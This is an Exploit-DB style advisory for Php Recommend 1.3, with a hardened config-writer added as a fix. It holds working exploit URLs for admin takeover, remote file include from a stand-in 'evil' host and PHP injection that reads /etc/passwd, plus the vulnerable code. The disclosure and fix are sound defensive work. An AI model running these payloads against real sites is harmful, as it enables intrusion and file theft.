Vendor: php_recommend
Author: scriptjunkie
CVSS: 7.5 (HIGH)
Category: Authentication Bypass/Remote File Include/Code Injection
CWE: 20, 94, 264
Product Name: php_recommend
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: a:php_recommend:php_recommend
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Php Recommend <=1.3 Authentication Bypass/Remote File Include/Code Injection Exploits

Php Recommend <=1.3 is vulnerable to authentication bypass, remote file include and code injection. In admin.php, the code that writes the submitted form values into phpre_config.php is reachable without the authentication result computed in server.php being enforced, so an unauthenticated attacker can change the admin credentials, point the include path at a remote file, or inject PHP code into the generated configuration file.

Mitigation:

Ensure that authentication is checked sufficiently and that all user input is properly sanitized.
Source (Exploit-DB raw data):

Php Recommend <=1.3 Authentication Bypass/Remote File Include/Code Injection Exploits

Author: scriptjunkie (scriptjunkie.1 {nospam} googlemail {nospam} com)
Conditions:
  RFI: allow_url_fopen = On
  Code injection: magic_quotes_gpc = Off

Exploits:
Authentication Bypass:
change admin username and password:
vulnerable.com/admin.php?submit=submit&form_admin_user=USERNAME&form_admin_pass=PASSWORD

RFI:
vulnerable.com/admin.php?submit=submit&form_include_template=http://evil/evil.php

Code Injection:
vulnerable.com/admin.php?submit=submit&form_aula=';readfile('/etc/passwd');'
Vulnerable code in "admin.php":

if($submit){
    // $submit and every $form_* variable come straight from the request
    // (register_globals); no authentication result is consulted here.
    // The "<", ">" and "" fragments are assembled at run time so the string
    // below can contain "<?php", "?>" and a literal "$" without being parsed.
    $a = "'";
    $b = "<";
    $c = ">";
    $d = "";
    // Each value is dropped verbatim between single quotes. Nothing escapes a
    // quote inside the value, so the generated file is request-controlled PHP.
    $content = "".$b."?php
// Php Recommmend
// Created By Frax.dk
// GNU Licens
// Please do not delete this text
$".$d."page = '".$form_page."';
$".$d."include_template = '".$form_include_template."';
$".$d."cap = '".$form_cap."';
$".$d."title = '".$form_title."';
$".$d."aula = '".$form_aula."';
$".$d."language = '".$form_language."';
$".$d."admin_user = '".$form_admin_user."';
$".$d."admin_pass = '".$form_admin_pass."';

// -- Maincore -- //

include $".$d."include_template;
?".$c."";

    $file_name = "phpre_config.php";
    $file = $file_name;
    $create_file = fopen($file, "w+");

    if(!$create_file){die("<td><span style='color:red;'><? echo $error1; ?></span></td>\n");}

    //attempt to write basic content to the file
    if (fwrite($create_file, $content) === FALSE) {
        echo "<td><span style='color:red;'><? echo $error2; ?></span></td>\n";
    }else{echo "Succes";}
    fclose($create_file);
}

which is reached since the authentication in server.php:
if($user == $admin_user && $admin_pass == $pass){
    $error = "false";
}else{
    setcookie("phpre_user", "", time()-3600);
    setcookie("phpre_pass", "", time()-3600);
    $error = "true";
}

is not checked sufficiently.

# milw0rm.com [2009-05-11]
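A hardened replacement for the config-writing branch of admin.php, added here as an illustration and not part of the original advisory or of Php Recommend: it enforces the result server.php computes before writing, restricts the template to a local file, and serialises every value with var_export() so form input is written as data rather than code. It assumes PHP 7 or later, that server.php sets $error exactly as quoted above and can be required from admin.php, and a templates/ directory; the form field names are the page's own.

```php
<?php
// Added example, not Php Recommend's code: hardened config writer for admin.php.
// Assumes PHP 7+, magic_quotes_gpc off (removed in PHP 5.4), and that
// server.php (assumption: required here) sets $error exactly as quoted above.
require __DIR__ . '/server.php';

// 1. Enforce the authentication result before anything else. The original
//    code reaches the file write no matter what server.php decided.
if (!isset($error) || $error !== "false") {
    http_response_code(403);
    exit('Not authorised');
}

// 2. Accept the form only via POST, never from a crafted GET link, and never
//    from register_globals-style bare variables.
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_POST['submit'])) {
    exit;
}

// 3. Restrict the template to a file name inside a local directory, so
//    form_include_template can no longer point at a remote URL.
$template_dir = __DIR__ . '/templates';          // assumed directory
$template = basename((string)($_POST['form_include_template'] ?? ''));
if ($template === '' || !is_file($template_dir . '/' . $template)) {
    exit('Invalid template');
}

// 4. Emit each value with var_export(): it produces a correctly quoted and
//    escaped PHP string literal, so a value containing ';readfile(...);'
//    is written as data instead of executable code.
$fields = ['page', 'cap', 'title', 'aula', 'language', 'admin_user', 'admin_pass'];
$lines  = ['<?php', '// generated by admin.php; do not edit by hand'];
foreach ($fields as $name) {
    $value   = (string)($_POST['form_' . $name] ?? '');
    $lines[] = '$' . $name . ' = ' . var_export($value, true) . ';';
}
$lines[] = '$include_template = ' . var_export($template_dir . '/' . $template, true) . ';';
$lines[] = 'include $include_template;';

// 5. Write with an exclusive lock so a partially written config is never included.
$written = file_put_contents(__DIR__ . '/phpre_config.php', implode("\n", $lines) . "\n", LOCK_EX);
if ($written === false) {
    exit('Could not write configuration');
}
echo 'Success';
```

The admin password is still stored as the plain string server.php compares against; hashing it would also require changing the comparison quoted above, which this example leaves untouched.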